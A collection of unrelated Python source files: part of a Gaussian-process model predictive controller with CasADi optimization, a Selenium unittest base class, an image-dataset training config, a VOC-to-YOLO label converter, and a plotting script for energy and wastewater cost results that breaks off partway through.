"""Uses the last MPC solution to precomupte values associated with the FITC GP approximation.
"""
n_data_points = self.gaussian_process.n_training_samples
dim_gp_inputs = len(self.input_mask)
dim_gp_outputs = len(self.target_mask)
inputs = self.train_data['train_inputs']
targets = self.train_data['train_targets']
# Get the inducing points.
if self.x_prev is not None and self.u_prev is not None:
# Use the previous MPC solution as in Hewing 2019.
z_ind = np.hstack((self.x_prev[:,:-1].T, self.u_prev.T))
z_ind = z_ind[:,self.input_mask]
else:
# If there is no previous solution. Choose T random training set points.
inds = self.env.np_random.choice(range(n_data_points), size=self.T)
#z_ind = self.data_inputs[inds][:, self.input_mask]
z_ind = inputs[inds][:, self.input_mask]
K_zind_zind = self.gaussian_process.kernel(torch.Tensor(z_ind).double())
K_zind_zind_inv = self.gaussian_process.kernel_inv(torch.Tensor(z_ind).double())
K_x_zind = self.gaussian_process.kernel(torch.from_numpy(inputs[:, self.input_mask]).double(),
torch.Tensor(z_ind).double())
Q_X_X = K_x_zind @ K_zind_zind_inv @ K_x_zind.transpose(1,2)
Gamma = torch.diagonal(self.gaussian_process.K_plus_noise + Q_X_X, 0, 1, 2)
Gamma_inv = torch.diag_embed(1/Gamma)
Sigma = torch.pinverse(K_zind_zind + K_x_zind.transpose(1,2) @ Gamma_inv @ K_x_zind)
mean_post_factor = torch.zeros((dim_gp_outputs, self.T))
for i in range(dim_gp_outputs):
mean_post_factor[i] = Sigma[i] @ K_x_zind[i].T @ Gamma_inv[i] @ \
torch.from_numpy(targets[:,self.target_mask[i]]).double()
return mean_post_factor.detach().numpy(), Sigma.detach().numpy(), K_zind_zind_inv.detach().numpy(), z_ind
def setup_gp_optimizer(self):
"""Sets up nonlinear optimization problem including cost objective, variable bounds and dynamics constraints.
"""
nx, nu = self.model.nx, self.model.nu
T = self.T
# Define optimizer and variables.
opti = cs.Opti()
# States.
x_var = opti.variable(nx, T + 1)
# Inputs.
u_var = opti.variable(nu, T)
# Initial state.
x_init = opti.parameter(nx, 1)
# Reference (equilibrium point or trajectory, last step for terminal cost).
x_ref = opti.parameter(nx, T + 1)
# Chance constraint limits.
state_constraint_set = []
for state_constraint in self.constraints.state_constraints:
state_constraint_set.append(opti.parameter(state_constraint.num_constraints, T+1))
input_constraint_set = []
for input_constraint in self.constraints.input_constraints:
input_constraint_set.append(opti.parameter(input_constraint.num_constraints, T))
# Sparse GP mean postfactor matrix.
mean_post_factor = opti.parameter(len(self.target_mask), T)
# Sparse GP inducing points.
z_ind = opti.parameter(T, len(self.input_mask))
# Cost (cumulative).
cost = 0
cost_func = self.model.loss
for i in range(T):
cost += cost_func(x=x_var[:, i],
u=u_var[:, i],
Xr=x_ref[:, i],
Ur=np.zeros((nu, 1)),
Q=self.Q,
R=self.R)["l"]
# Terminal cost.
cost += cost_func(x=x_var[:, -1],
u=np.zeros((nu, 1)),
Xr=x_ref[:, -1],
Ur=np.zeros((nu, 1)),
Q=self.Q,
R=self.R)["l"]
opti.minimize(cost)
z = cs.vertcat(x_var[:,:-1], u_var)
z = z[self.input_mask,:]
for i in range(self.T):
# Dynamics constraints using the dynamics of the prior and the mean of the GP.
# This follows the tractable dynamics formulation in Section III.B in Hewing 2019.
# Note that for the GP approximation, we are purposely using elementwise multiplication *.
if self.sparse_gp:
next_state = self.prior_dynamics_func(x0=x_var[:, i]-self.prior_ctrl.X_LIN[:,None],
p=u_var[:, i]-self.prior_ctrl.U_LIN[:,None])['xf'] + \
self.prior_ctrl.X_LIN[:,None]+ self.Bd @ cs.sum2(self.K_z_zind_func(z1=z[:,i].T, z2=z_ind)['K'] * mean_post_factor)
else:
# Sparse GP approximation doesn't always work well, thus, use Exact GP regression. This is much slower,
# but for unstable systems, make performance much better.
next_state = self.prior_dynamics_func(x0=x_var[:, i]-self.prior_ctrl.X_LIN[:,None],
p=u_var[:, i]-self.prior_ctrl.U_LIN[:,None])['xf'] + \
self.prior_ctrl.X_LIN[:,None]+ self.Bd @ self.gaussian_process.casadi_predict(z=z[:,i])['mean']
opti.subject_to(x_var[:, i + 1] == next_state)
# Probabilistic state and input constraints according to Hewing 2019 constraint tightening.
for s_i, state_constraint in enumerate(self.state_constraints_sym):
opti.subject_to(state_constraint(x_var[:, i]) <= state_constraint_set[s_i][:,i])
for u_i, input_constraint in enumerate(self.input_constraints_sym):
opti.subject_to(input_constraint(u_var[:, i]) <= input_constraint_set[u_i][:,i])
# Final state constraints.
for s_i, state_constraint in enumerate(self.state_constraints_sym):
opti.subject_to(state_constraint(x_var[:, -1]) <= state_constraint_set[s_i][:,-1])
# Initial condition constraints.
opti.subject_to(x_var[:, 0] == x_init)
# Create solver (IPOPT solver in this version).
opts = {"ipopt.print_level": 4,
"ipopt.sb": "yes",
"ipopt.max_iter": 100, #100,
"print_time": 1}
opti.solver('ipopt', opts)
self.opti_dict = {
"opti": opti,
"x_var": x_var,
"u_var": u_var,
"x_init": x_init,
"x_ref": x_ref,
"state_constraint_set": state_constraint_set,
"input_constraint_set": input_constraint_set,
"mean_post_factor": mean_post_factor,
"z_ind": z_ind,
"cost": cost
}
def select_action_with_gp(self,
obs
):
"""Solves nonlinear MPC problem to get next action.
Args:
obs (np.array): current state/observation.
Returns:
np.array: input/action to the task/env.
"""
opti_dict = self.opti_dict
opti = opti_dict["opti"]
x_var = opti_dict["x_var"]
u_var = opti_dict["u_var"]
x_init = opti_dict["x_init"]
x_ref = opti_dict["x_ref"]
state_constraint_set = opti_dict["state_constraint_set"]
input_constraint_set = opti_dict["input_constraint_set"]
mean_post_factor = opti_dict["mean_post_factor"]
z_ind = opti_dict["z_ind"]
cost = opti_dict["cost"]
# Assign the initial state.
opti.set_value(x_init, obs)
# Assign reference trajectory within horizon.
goal_states = self.get_references()
opti.set_value(x_ref, goal_states)
if self.mode == "tracking":
self.traj_step += 1
# Set the probabilistic state and input constraint set limits.
state_constraint_set_prev, input_constraint_set_prev = self.precompute_probabilistic_limits()
for si in range(len(self.constraints.state_constraints)):
opti.set_value(state_constraint_set[si], state_constraint_set_prev[si])
for ui in range(len(self.constraints.input_constraints)):
opti.set_value(input_constraint_set[ui], input_constraint_set_prev[ui])
mean_post_factor_val, Sigma, K_zind_zind_inv, z_ind_val = self.precompute_sparse_gp_values()
opti.set_value(mean_post_factor, mean_post_factor_val)
opti.set_value(z_ind, z_ind_val)
# Initial guess for the optimization problem.
if self.warmstart and self.x_prev is not None and self.u_prev is not None:
# shift previous solutions by 1 step
x_guess = deepcopy(self.x_prev)
u_guess = deepcopy(self.u_prev)
x_guess[:, :-1] = x_guess[:, 1:]
u_guess[:-1] = u_guess[1:]
opti.set_initial(x_var, x_guess)
opti.set_initial(u_var, u_guess)
# Solve the optimization problem.
try:
sol = opti.solve()
x_val, u_val = sol.value(x_var), sol.value(u_var)
except RuntimeError:
x_val, u_val = opti.debug.value(x_var), opti.debug.value(u_var)
u_val = np.atleast_2d(u_val)
self.x_prev = x_val
self.u_prev = u_val
self.results_dict['horizon_states'].append(deepcopy(self.x_prev))
self.results_dict['horizon_inputs'].append(deepcopy(self.u_prev))
zi = np.hstack((x_val[:,0], u_val[:,0]))
zi = zi[self.input_mask]
gp_contribution = np.sum(self.K_z_zind_func(z1=zi, z2=z_ind_val)['K'].toarray() * mean_post_factor_val,axis=1)
print("GP Mean eq Contribution: %s" % gp_contribution)
zi = np.hstack((x_val[:,0], u_val[:,0]))
pred, _, _ = self.gaussian_process.predict(zi[None,:])
print("True GP value: %s" % pred.numpy())
lin_pred = self.prior_dynamics_func(x0=x_val[:,0]-self.prior_ctrl.X_LIN,
p=u_val[:, 0]-self.prior_ctrl.U_LIN)['xf'].toarray() + \
self.prior_ctrl.X_LIN[:,None]
self.results_dict['linear_pred'].append(lin_pred)
self.results_dict['gp_mean_eq_pred'].append(gp_contribution)
self.results_dict['gp_pred'].append(pred.numpy())
# Take the first one from solved action sequence.
if u_val.ndim > 1:
action = u_val[:, 0]
else:
action = np.array([u_val[0]])
self.prev_action = action,
return action
def learn(self,
input_data=None,
target_data=None,
gp_model=None,
plot=False
):
"""Performs GP training.
Args:
input_data, target_data (optiona, np.array): data to use for training
gp_model (str): if not None, this is the path to pretrained models to use instead of training new ones.
plot (bool): to plot validation trajectories or not.
Returns:
training_results (dict): Dictionary of the training results.
"""
if gp_model is None:
gp_model = self.gp_model_path
self.prior_ctrl.remove_constraints(self.prior_ctrl.additional_constraints)
self.reset()
if self.online_learning:
input_data = np.zeros((self.train_iterations, len(self.input_mask)))
target_data = np.zeros((self.train_iterations, len(self.target_mask)))
if input_data is None and target_data is None:
train_inputs = []
train_targets = []
train_info = []
############
# Use Latin Hypercube Sampling to generate states withing environment bounds.
lhs_sampler = Lhs(lhs_type='classic', criterion='maximin')
limits = [(self.env.INIT_STATE_RAND_INFO[key].low, self.env.INIT_STATE_RAND_INFO[key].high) for key in
self.env.INIT_STATE_RAND_INFO]
# todo: parameterize this if we actually want it.
num_eq_samples = 0
samples = lhs_sampler.generate(limits,
self.train_iterations + self.validation_iterations - num_eq_samples,
random_state=self.seed)
# todo: choose if we want eq samples or not.
delta = 0.01
eq_limits = [(self.prior_ctrl.X_LIN[eq]-delta, self.prior_ctrl.X_LIN[eq]+delta) for eq in range(self.model.nx)]
if num_eq_samples > 0:
eq_samples = lhs_sampler.generate(eq_limits, num_eq_samples, random_state=self.seed)
#samples = samples.append(eq_samples)
init_state_samples = np.array(samples + eq_samples)
else:
init_state_samples = np.array(samples)
input_limits = np.vstack((self.constraints.input_constraints[0].lower_bounds,
self.constraints.input_constraints[0].upper_bounds)).T
input_samples = lhs_sampler.generate(input_limits,
self.train_iterations + self.validation_iterations,
random_state=self.seed)
input_samples = np.array(input_samples) # not being used currently
seeds = self.env.np_random.randint(0,99999, size=self.train_iterations + self.validation_iterations)
load_from_file = False
if load_from_file:
gpmpc_data = np.load("/home/erl/repos/journal_zhichao/safe-control-gym/experiments/annual_reviews/figure6/data/small_drone/statecontroldata_rand_good1.npz")
x_seq_all = gpmpc_data["x_seq_all"]
x_next_seq_all = gpmpc_data["x_next_seq_all"]
u_seq_all = gpmpc_data["u_seq_all"]
else:
x_seq_all = []
u_seq_all = []
x_next_seq_all = []
for i in range(self.train_iterations + self.validation_iterations):
if load_from_file:
x_seq = x_seq_all[i]
x_next_seq = x_next_seq_all[i]
u_seq = u_seq_all[i]
else:
# For random initial state training.
init_state = init_state_samples[i,:]
# Collect data with prior controller.
run_env = self.env_func(init_state=init_state, randomized_init=False, seed=int(seeds[i]))
episode_results = self.prior_ctrl.run(env=run_env, max_steps=1, gp_training = True)
run_env.close()
x_obs = episode_results['obs'][-3:,:]
u_seq = episode_results['action'][-1:,:]
run_env.close()
x_seq = x_obs[:-1,:]
x_next_seq = x_obs[1:,:]
x_seq_all.append(x_seq)
x_next_seq_all.append(x_next_seq)
u_seq_all.append(u_seq)
train_inputs_i, train_targets_i = self.preprocess_training_data(x_seq, u_seq, x_next_seq)
train_inputs.append(train_inputs_i)
train_targets.append(train_targets_i)
np.savez("/home/erl/repos/journal_zhichao/safe-control-gym/experiments/annual_reviews/figure6/data/small_drone/statecontroldata_rand.npz", x_seq_all = x_seq_all, x_next_seq_all = x_next_seq_all, u_seq_all = u_seq_all)
###########
else:
train_inputs = input_data
train_targets = target_data
# assign all data
train_inputs = np.vstack(train_inputs)
train_targets = np.vstack(train_targets)
self.data_inputs = train_inputs
self.data_targets = train_targets
train_idx, test_idx = train_test_split(
#list(range(self.train_iterations + self.validation_iterations)),
list(range(train_inputs.shape[0])),
test_size=self.validation_iterations/(self.train_iterations+self.validation_iterations),
random_state=self.seed
)
train_inputs = self.data_inputs[train_idx, :]
train_targets = self.data_targets[train_idx, :]
self.train_data = {'train_inputs': train_inputs, 'train_targets': train_targets}
test_inputs = self.data_inputs[test_idx, :]
test_targets = self.data_targets[test_idx, :]
self.test_data = {'test_inputs': test_inputs, 'test_targets': test_targets}
train_inputs_tensor = torch.Tensor(train_inputs).double()
train_targets_tensor = torch.Tensor(train_targets).double()
test_inputs_tensor = torch.Tensor(test_inputs).double()
test_targets_tensor = torch.Tensor(test_targets).double()
if plot:
init_state = np.array([-1.0, 0.0, 0.0, 0.0, 0.0, 0.0])
valid_env = self.env_func(init_state=init_state,
randomized_init=False)
validation_results = self.prior_ctrl.run(env=valid_env,
max_steps=40)
valid_env.close()
x_obs = validation_results['obs']
u_seq = validation_results['action']
x_seq = x_obs[:-1, :]
x_next_seq = x_obs[1:, :]
# Define likelihood.
likelihood = gpytorch.likelihoods.GaussianLikelihood(
noise_constraint=gpytorch.constraints.GreaterThan(1e-6),
).double()
self.gaussian_process = GaussianProcessCollection(ZeroMeanIndependentGPModel,
likelihood,
len(self.target_mask),
input_mask=self.input_mask,
target_mask=self.target_mask,
normalize=self.normalize_training_data
)
if gp_model:
self.gaussian_process.init_with_hyperparam(train_inputs_tensor,
train_targets_tensor,
gp_model)
else:
# Train the GP.
self.gaussian_process.train(train_inputs_tensor,
train_targets_tensor,
test_inputs_tensor,
test_targets_tensor,
n_train=self.optimization_iterations,
learning_rate=self.learning_rate,
gpu=self.use_gpu,
dir=self.output_dir)
# Plot validation.
if plot:
validation_inputs, validation_targets = self.preprocess_training_data(x_seq, u_seq, x_next_seq)
fig_count = 0
fig_count = self.gaussian_process.plot_trained_gp(torch.Tensor(validation_inputs).double(),
torch.Tensor(validation_targets).double(),
fig_count=fig_count)
self.set_gp_dynamics_func()
self.setup_gp_optimizer()
self.prior_ctrl.add_constraints(self.prior_ctrl.additional_constraints)
self.prior_ctrl.reset()
# Collect training results.
training_results = {}
training_results['train_targets'] = train_targets
training_results['train_inputs'] = train_inputs
try:
training_results['info'] = train_info
except UnboundLocalError:
training_results['info'] = None
return training_results
def select_action(self,
obs
):
"""Select the action based on the given observation.
Args:
obs (np.array): current observed state.
Returns:
action (np.array): desired policy action.
"""
if self.gaussian_process is None:
action = self.prior_ctrl.select_action(obs)
else:
if(self.last_obs is not None and self.last_action is not None and self.online_learning):
print("[ERROR]: Not yet supported.")
exit()
t1 = time.perf_counter()
action = self.select_action_with_gp(obs)
t2 = time.perf_counter()
print("GP SELECT ACTION TIME: %s" %(t2 - t1))
self.last_obs = obs
self.last_action = action
return action
def close(self):
"""Clean up.
"""
self.env_training.close()
self.env.close()
def reset_results_dict(self):
"""
"""
"Result the results_dict before running."
super().reset_results_dict()
self.results_dict['input_constraint_set'] = []
self.results_dict['state_constraint_set'] = []
self.results_dict['state_horizon_cov'] = []
self.results_dict['input_horizon_cov'] = []
self.results_dict['gp_mean_eq_pred'] = []
self.results_dict['gp_pred'] = []
self.results_dict['linear_pred'] = []
def reset(self):
"""Reset the controller before running.
"""
# Setup reference input.
if self.env.TASK == Task.STABILIZATION:
self.mode = "stabilization"
self.x_goal = self.env.X_GOAL
elif self.env.TASK == Task.TRAJ_TRACKING:
self.mode = "tracking"
self.traj = self.env.X_GOAL.T
self.traj_step = 0
# Dynamics model.
if self.gaussian_process is not None:
self.set_gp_dynamics_func()
# CasADi optimizer.
self.setup_gp_optimizer()
self.prior_ctrl.reset()
# Previously solved states & inputs, useful for warm start.
self.x_prev = None
self.u_prev = None
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Public Library of Science
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import unittest
import random
from teamcity import is_running_under_teamcity
from teamcity.unittestpy import TeamcityTestRunner
from .WebDriverFactory import WebDriverFactory
__author__ = 'jkrzemien@plos.org'
class FrontEndTest(unittest.TestCase):
"""
Base class to provide Front End tests with desired WebDriver instances, as defined in
[[Config.py]].
It inherits from `TestCase` in order to count as a test suite for Python's `unittest` framework.
"""
# This defines any `FrontEndTest` derived class as able to be run by Nose in a parallel way.
# Requires Nose's `MultiProcess` plugin to be *enabled*
_multiprocess_can_split_ = True
# Will contain a single driver instance for the current test
_driver = None
# Will contain a list of driver (not instantiated) for the current test variations
# (for all browsers)
_injected_drivers = []
# Factory object to instantiate drivers
factory = WebDriverFactory()
def setUp(self):
pass
def tearDown(self):
"""
Method in charge of destroying the WebDriver/Proxy instances
once the test finished running (even upon test failure).
"""
if self._driver:
self._driver.quit()
else:
self.factory.teardown_webdriver()
def getDriver(self):
"""
Simple method to retrieve the WebDriver/Proxy instances for this class to test method.
"""
if not self._driver:
if len(self._injected_drivers) > 0:
self._driver = self.factory.setup_remote_webdriver(self._injected_drivers.pop())
else:
self._driver = self.factory.setup_webdriver()
return self._driver
@staticmethod
def _run_tests_randomly():
"""
*Static* method for every test suite inheriting this class to be able to run its tests
in, at least, a non linear fashion.
"""
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: random.choice([-1, 1])
if is_running_under_teamcity():
runner = TeamcityTestRunner()
else:
runner = unittest.TextTestRunner()
unittest.main(testRunner=runner)
|
# dataset settings
data_source = 'ImageNet'
dataset_type = 'RotationPredDataset'
img_norm_cfg = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_pipeline = [
dict(type='RandomResizedCrop', size=224),
dict(type='RandomHorizontalFlip'),
]
test_pipeline = [
dict(type='Resize', size=256),
dict(type='CenterCrop', size=224),
]
# prefetch
prefetch = False
if not prefetch:
train_pipeline.extend(
[dict(type='ToTensor'),
dict(type='Normalize', **img_norm_cfg)])
test_pipeline.extend(
[dict(type='ToTensor'),
dict(type='Normalize', **img_norm_cfg)])
# dataset summary
data = dict(
samples_per_gpu=16, # (16*4) x 8 = 512
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_source=dict(
type=data_source,
data_prefix='data/imagenet/train',
ann_file='data/imagenet/meta/train.txt',
),
pipeline=train_pipeline,
prefetch=prefetch),
val=dict(
type=dataset_type,
data_source=dict(
type=data_source,
data_prefix='data/imagenet/val',
ann_file='data/imagenet/meta/val.txt',
),
pipeline=test_pipeline,
prefetch=prefetch))
|
import argparse
from xml.etree import ElementTree as ET
import os
from pickle import dump
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument("dir")
parser.add_argument("save")
args = parser.parse_args()
path = os.path.join(args.dir)
classes_nums = {"cat" : 0 , "dog" : 1}
keys = list(classes_nums.keys())
try:
os.mkdir(args.save)
except:
print("Folder is already exist !")
def ToMidPoint(x1 , y1 , x2 , y2 , size):
dw = 1.0 / size[0]
dh = 1.0 / size[1]
h = y2 - y1
w = x2 - x1
x = (x1 + (w/2))
y = (y1 + (h/2))
return x * dw , y * dh , w * dw , h * dh
for File in tqdm(os.listdir(path)):
obj_list = 0
xml_path = os.path.join(path , File)
file_name = "{}/{}".format(args.save , File.replace("xml" , "txt"))
tree = ET.parse(xml_path)
root = tree.getroot()
size = root.find('size')
w_img = int(size.find('width').text)
h_img = int(size.find('height').text)
with open(file_name , "w") as F :
for obj in root.iter("object"):
class_name = obj.find("name").text
if class_name not in keys:
continue
obj_list += 1
class_id = classes_nums[class_name]
xml_box = obj.find("bndbox")
nedded = ["xmin" , "ymin" , "xmax" , "ymax"]
x1 , y1 = float(xml_box.find(nedded[0]).text) , float(xml_box.find(nedded[1]).text)
x2 , y2 = float(xml_box.find(nedded[2]).text) , float(xml_box.find(nedded[3]).text)
x , y , w , h = ToMidPoint(x1 , y1 , x2 , y2 , (w_img , h_img))
F.write("{} {} {} {} {}\n".format(class_id , x , y , w , h))
if obj_list == 0:
os.remove(file_name)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 4 2020
@Author: PouyaRZ
____________________________________________________
Plots to produce:
1. LCC of equipment for each scenario for all the individuals
2, SCC of equipment for each scenario for all the individuals
3. SCC vs LCC scatter plot.
4. SCC vs chiller type
5. SCC vs CHP type,
6. LCC vs chiller type
7. SCC vs CHP type
8. Traces of building types across all the runs
____________________________________________________
"""
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
def DF_Filter(filename):
file = np.loadtxt(filename, dtype='float')
inputDF = pd.DataFrame(file)
error_tol = 1.15
# print('GFA stats:')
# print(inputDF.iloc[:,38].describe())
print('+++++ processing %s +++++\n'%(filename))
print('Count duplicates:')
condition1 = inputDF.duplicated()==True
print(inputDF[condition1][38].count())
print('Count under the min GFA:') # Count non-trivial neighborhoods
condition2 = inputDF[38] <= 1/error_tol#<=647497/10
print(inputDF[condition2][38].count())
print('Count over the max GFA:')
condition3 = inputDF[38]>=647497*5*error_tol
print(inputDF[condition3][38].count())
print('Count over the max Site GFA:')
condition4 = inputDF[38]/inputDF[36]>=647497*error_tol
print(inputDF[condition4][38].count())
print('Count valid answers:')
print(len(inputDF) - inputDF[condition1 | condition2 | condition3 | condition4][38].count())
# print('------------------')
# Filtering the inadmissible results
Filtered = ~(condition1 | condition2 | condition3 | condition4)
inputDF = inputDF[Filtered]
inputDF.reset_index(inplace=True, drop=True)
# print('Annual energy demand stats (MWh):')
inputDF[26] /= inputDF[38] # Normalizing LCC ($/m2)
inputDF[27] /= inputDF[38] # Normalizing SCC ($/m2)
inputDF[39] /= inputDF[38] # Normalizing CO2 (Tonnes/m2)
inputDF[40] /= (10**3*inputDF[38]) # Normalizing total energy demand (MWh/m2)
inputDF[41] /= inputDF[38] # Normalizing total wwater treatment demand (L/m2)
for i in range(29,36): # Converting percent areas to integer %
inputDF[i] = inputDF[i] * 100
# print(inputDF[40].describe())
return inputDF
### MAIN FUNCTION
print('loading data')
filenames = ['../RQ1_W_CWWTP_ModConsts_Feb17/SDO_LHS_TestRuns288_Constraint_SF_Test.txt',
'../RQ1_WO_CWWTP_ModConsts_Feb17/SDO_LHS_TestRuns288_Constraint_SF_Test.txt']
DFNames = ['CCHP|CWWTP','CCHP+WWT']
DFs = {}
for i in range(2):
DFs[DFNames[i]] = DF_Filter(filenames[i])
plt.style.use('ggplot')
colors_rb = {DFNames[0]:'r', DFNames[1]:'b'}
# =============================================================================
## CHP/Chiller/Solar Types used in the individual neighborhood
CHP_Types = {}
CHP_Types[1] = 'Gas_1'
CHP_Types[2] = 'Gas_2'
CHP_Types[3] = 'Gas_3'
CHP_Types[4] = 'Gas_4'
CHP_Types[5] = 'Gas_5'
CHP_Types[6] = 'Micro_1'
CHP_Types[7] = 'Micro_2'
CHP_Types[8] = 'Micro_3'
CHP_Types[9] = 'Recipro_1'
CHP_Types[10] = 'Recipro_2'
CHP_Types[11] = 'Recipro_3'
CHP_Types[12] = 'Recipro_4'
CHP_Types[13] = 'Recipro_5'
CHP_Types[14] = 'Steam_1'
CHP_Types[15] = 'Steam_2'
CHP_Types[16] = 'Steam_3'
CHP_Types[17] = 'Fuel_Cell_1'
CHP_Types[18] = 'Fuel_Cell_2'
CHP_Types[19] = 'Fuel_Cell_3'
CHP_Types[20] = 'Fuel_Cell_4'
CHP_Types[21] = 'Fuel_Cell_5'
CHP_Types[22] = 'Fuel_Cell_6'
CHP_Types[23] = 'Bio_1'
CHP_Types[24] = 'Bio_2'
CHP_Types[25] = 'Bio_3'
CHP_Types[26] = 'Bio_4'
CHP_Types[27] = 'Bio_5'
CHP_Types[28] = 'Bio_6'
CHP_Types[29] = 'Bio_7'
CHP_Types[30] = 'Bio_8'
CHP_Types[31] = 'Bio_9'
CHP_Types[32] = 'Bio_10'
Chiller_Types = {}
Chiller_Types[1] = 'Electric_1'
Chiller_Types[2] = 'Electric_2'
Chiller_Types[3] = 'Electric_3'
Chiller_Types[4] = 'Electric_4'
Chiller_Types[5] = 'Electric_5'
Chiller_Types[6] = 'Electric_6'
Chiller_Types[7] = 'Electric_7'
Chiller_Types[8] = 'Electric_8'
Chiller_Types[9] = 'Electric_9'
Chiller_Types[10] = 'Absorp_1'
Chiller_Types[11] = 'Absorp_2'
Chiller_Types[12] = 'Absorp_3'
Chiller_Types[13] = 'Absorp_4'
Chiller_Types[14] = 'Absorp_5'
Chiller_Types[15] = 'Absorp_6'
Chiller_Types[16] = 'Absorp_7'
Chiller_Types[17] = 'Absorp_8'
WWT_Types = {}
WWT_Types[1] = "FO_MD"
WWT_Types[2] = "FO_RO"
WWT_Types[3] = "CWWTP"
## CHP, Chiller and WWT name assignments
# CHP = {}
# Chiller = {}
# WWT = {}
for DFName in DFNames:
# CHP[DFName] = np.array([CHP_Types[int(i)] for i in DFs[DFName][21]]) # Making strings of CHP names instead of integers
DFs[DFName][21] = np.array([CHP_Types[int(i)] for i in DFs[DFName][21]]) # Making strings of CHP names instead of integers
# Chiller[DFName] = np.array([Chiller_Types[int(i)] for i in DFs[DFName][22]]) # Making strings of Chiller names instead of integers
DFs[DFName][22] = np.array([Chiller_Types[int(i)] for i in DFs[DFName][22]]) # Making strings of Chiller names instead of integers
# WWT[DFName] = np.array([WWT_Types[int(i)] for i in DFs[DFName][24]]) # Making strings of WWT module names instead of integers
DFs[DFName][24] = np.array([WWT_Types[int(i)] for i in DFs[DFName][24]]) # Making strings of WWT module names instead of integers
# =============================================================================
######################## PLOTS ##########################
#############################################
print('plotting overall LCC and SCC graphs')
# LCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=26, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF.index,y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel('Rank')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_Ascending.png', dpi=400, bbox_inches='tight')
# SCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=27, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF.index,y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel('Rank')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('SCC')
plt.legend()
plt.savefig('SCC_Ascending.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting LCC and SCC box plots')
print('\n#############################################')
print('Stats of LCC ($/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][26]).describe())
print('Stats of LCC ($/m2) for Integrated Case:\n',(DFs[DFNames[1]][26]).describe())
print('Stats of SCC ($/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][27]).describe())
print('Stats of SCC ($/m2) for Integrated Case:\n',(DFs[DFNames[1]][27]).describe())
print('#############################################\n')
# =============================================================================
# # LCC
# plt.figure(figsize=(10,5))
# # for DFName in DFNames:
# plt.boxplot(x=[(DFs[DFNames[0]][26]/10**3), (DFs[DFNames[1]][26]/10**3)])
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# # plt.xlabel('Rank')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.xticks([1,2],[DFNames[0],DFNames[1]])
# # plt.title('LCC')
# plt.savefig('LCC_Boxplot.png', dpi=400, bbox_inches='tight')
#
#
#
# # SCC
# plt.figure(figsize=(10,5))
# # for DFName in DFNames:
# plt.boxplot(x=[(DFs[DFNames[0]][27]/10**3), (DFs[DFNames[1]][27]/10**3)])
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# # plt.xlabel('Rank')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.xticks([1,2],[DFNames[0],DFNames[1]])
# # plt.title('LCC')
# plt.savefig('SCC_Boxplot.png', dpi=400, bbox_inches='tight')
#
# plt.close('all')
# =============================================================================
'''
#############################################
print('plotting LCC/SCC vs total neighborhood energy and ww graphs')
print('\n#############################################')
print('Stats of Total Energy Demand (MWh/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][40]).describe())
print('Stats of Total Energy Demand (MWh/m2) for Integrated Case:\n',(DFs[DFNames[1]][40]).describe())
print('Stats of Total Wastewater Treatment Demand (m3/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][41]/10**3).describe())
print('Stats of Total Wastewater Treatment Demand (m3/m2) for Integrated Case:\n',(DFs[DFNames[1]][41]/10**3).describe())
print('#############################################\n')
# LCC vs Neighborhood's Total Energy Use
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[40]),y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_vs_Energy_Demand.png', dpi=400, bbox_inches='tight')
# LCC vs Neighborhood's Total WWater Demand
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
